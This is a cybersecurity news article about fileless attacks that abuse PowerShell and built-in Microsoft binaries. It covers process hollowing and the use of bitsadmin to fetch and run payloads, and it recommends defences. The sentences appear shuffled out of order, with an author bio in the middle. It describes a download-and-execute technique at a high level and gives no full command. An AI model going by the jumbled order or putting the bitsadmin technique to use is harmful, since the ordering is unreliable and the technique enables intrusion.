Hackers Weaponizing PowerShell & Microsoft Legitimate Apps To Deploy Malware

Rather than writing files to disk, attackers inject malicious code directly into running processes or leverage built-in Windows tools to execute their payloads, making detection exceedingly difficult for conventional security solutions. The attackers leverage these trusted binaries to blend their activities with normal system operations, making it nearly impossible for traditional security tools to distinguish between legitimate use and malicious exploitation. Security professionals recommend implementing comprehensive endpoint detection and response solutions with memory analysis capabilities, enabling PowerShell logging and monitoring, implementing constrained language mode, and actively monitoring Active Directory for suspicious activities to defend against these sophisticated threats. Process hollowing, a technique first popularized by Stuxnet, involves executing a legitimate application in suspended mode, replacing its code with malware in memory, and then resuming execution—effectively hiding malicious activity behind a trusted process name. Cybersecurity experts have recently observed a concerning trend in attack methodologies, with threat actors increasingly leveraging fileless techniques that weaponize PowerShell and legitimate Microsoft applications to deploy malware while evading detection. These sophisticated attacks operate primarily in memory, leaving minimal forensic evidence and bypassing traditional security solutions that rely on file-based detection methods. According to recent security reports, approximately one-third of all attacks now employ fileless techniques, making them a prevalent threat in today’s cyber landscape. Particularly concerning is the growing abuse of Living Off The Land Binaries And Scripts (LOLBAS), which involves repurposing legitimate Microsoft applications for malicious purposes. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. The commands create jobs to retrieve malicious files and execute them through a sequence like: bitsadmin /create followed by additional commands to configure and execute the payload.

This Cyber News was published on cybersecuritynews.com. Publication date: Mon, 03 Mar 2025 18:05:22 +0000